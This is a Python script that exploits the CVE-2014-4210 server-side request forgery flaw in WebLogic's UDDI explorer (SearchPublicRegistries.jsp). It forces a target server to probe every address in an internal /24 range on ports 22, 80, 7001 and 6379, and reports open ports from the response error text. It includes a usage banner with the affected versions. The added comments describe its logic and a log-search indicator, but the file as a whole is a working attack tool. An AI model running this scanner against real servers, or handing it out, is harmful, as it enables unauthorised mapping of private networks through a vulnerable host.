cve-2014-4210_ssrf_scan.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import sys
import time
import threading
import requests
import Queue
# Shared module state: `threads` collects the MyThread workers created by
# find_ip(), and `lock` serialises the result line printed by scan().
threads = list()
lock = threading.Lock()
class MyThread(threading.Thread):
    """Worker thread that feeds IP strings from a shared queue into scan()."""

    def __init__(self, queue):
        super(MyThread, self).__init__()
        self.queue = queue

    def run(self):
        """Take IP strings off the queue until the first exception.

        The queue is read without blocking, so an empty queue raises and
        ends the thread. The handler catches every Exception, which means
        an error raised out of scan() ends the thread in the same way.
        The original author notes that stopping as soon as the queue is
        empty may not suit every scenario and can be changed.
        """
        while True:
            try:
                scan(self.queue.get(block=False))
            except Exception:
                return
def scan(ip_str):
    """Check a fixed set of ports on *ip_str* through the target's UDDI explorer.

    For each port a GET is sent to ``/uddiexplorer/SearchPublicRegistries.jsp``
    on the module-level ``target`` with the ``operator`` parameter set to
    ``http://<ip_str>:<port>``. The connection to ``ip_str`` is therefore
    attempted by the target server rather than by this host (CVE-2014-4210).

    A port is printed as ``[+] ip:port`` when the response body contains
    ``weblogic.uddi.client.structures.exception.XML_SoapException`` and
    contains neither ``but could not connect`` nor ``No route to host``.

    Seen from the server, this is a run of requests to that JSP whose
    ``operator`` value steps through internal addresses and ports; that
    pattern is what to search access logs for when reviewing exposure of
    the uddiexplorer application.
    """
    probe_ports = ('22', '80', '7001', '6379')
    for port in probe_ports:
        # Only the query template is %-formatted; `target` is concatenated as-is.
        probe_query = (
            "/uddiexplorer/SearchPublicRegistries.jsp"
            "?operator=http://%s:%s"
            "&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor="
            "&selfor=Business+location&btnSubmit=Search"
        ) % (ip_str, port)
        exp_url = "http://" + target + probe_query
        try:
            response = requests.get(exp_url, timeout=3, verify=False)
            body = response.content
            # Marker that the server processed the operator URL (SSRF check).
            soap_error = re.search(
                'weblogic.uddi.client.structures.exception.XML_SoapException', body)
            # Connection lost: the port could not be connected to.
            refused = re.search('but could not connect', body)
            # No route to host: the scanned address does not exist.
            unroutable = re.search('No route to host', body)
            if soap_error is not None and refused is None and unroutable is None:
                # The lock keeps output lines from different threads apart.
                lock.acquire()
                print('[+] ' + ip_str + ':' + port)
                lock.release()
        except Exception:
            # Request and matching errors are dropped silently, so a failed
            # request is indistinguishable from a port that did not match.
            pass
def find_ip(ip_prefix, Thread_count):
    '''
    Given a prefix such as 192.168.1, scan every address in that segment.

    Hosts ``<ip_prefix>.1`` through ``<ip_prefix>.255`` are queued, then
    ``int(Thread_count)`` MyThread workers are appended to the module-level
    ``threads`` list, started and joined. Errors from start() or join() are
    printed and the loop moves on to the next thread.

    NOTE(review): ``threads`` is never cleared here, so workers left in it by
    an earlier call would be started and joined again.
    '''
    thread_count = int(Thread_count)
    queue = Queue.Queue()
    banner_rule = "[*]+------------------------+"

    print(banner_rule)
    print("[*]+ Scanning ip and port +")
    print(banner_rule)

    for last_octet in range(1, 256):
        queue.put('%s.%s' % (ip_prefix, last_octet))

    # All workers share the one queue.
    threads.extend(MyThread(queue) for _ in range(thread_count))

    for worker in threads:
        try:
            worker.start()
        except Exception as e:
            print(e)

    # Wait for every worker before reporting completion.
    for worker in threads:
        try:
            worker.join()
        except Exception as e:
            print(e)

    print(banner_rule)
    print("[*]+ Scan completed +")
    print(banner_rule)
if __name__ == "__main__":
    # Exactly three arguments must follow the script name; otherwise the
    # usage banner is printed and the program exits.
    if len(sys.argv) != 4:
        usage_rule = "+----------------------------------------------------------------------+"
        usage_lines = (
            usage_rule,
            "+ USE: python <filename> <target_ip:port> <scan_address> <process> +",
            "+ EXP: python cve-2014-4210_ssrf_scan.py 1.1.1.1:7001 192.168.1.0 20 +",
            "+ VER: 10.0.2,10.3.6 +",
            usage_rule,
        )
        for usage_line in usage_lines:
            print(usage_line)
        sys.exit()

    # `target` stays a module global because scan() reads it by name.
    target = sys.argv[1]

    # NOTE(review): the scan address and the thread count are concatenated
    # before the last dotted component is dropped. The count ends up inside
    # that dropped component, so the prefix is unaffected as long as the
    # count contains no dot; sys.argv[2] alone looks like what was intended.
    commandargs = sys.argv[2:]
    args = "".join(commandargs)
    ip_prefix = '.'.join(args.split('.')[:-1])
    print(ip_prefix)

    # Passed through as a string; find_ip() converts it with int().
    thread_count = sys.argv[3]
    find_ip(ip_prefix, thread_count)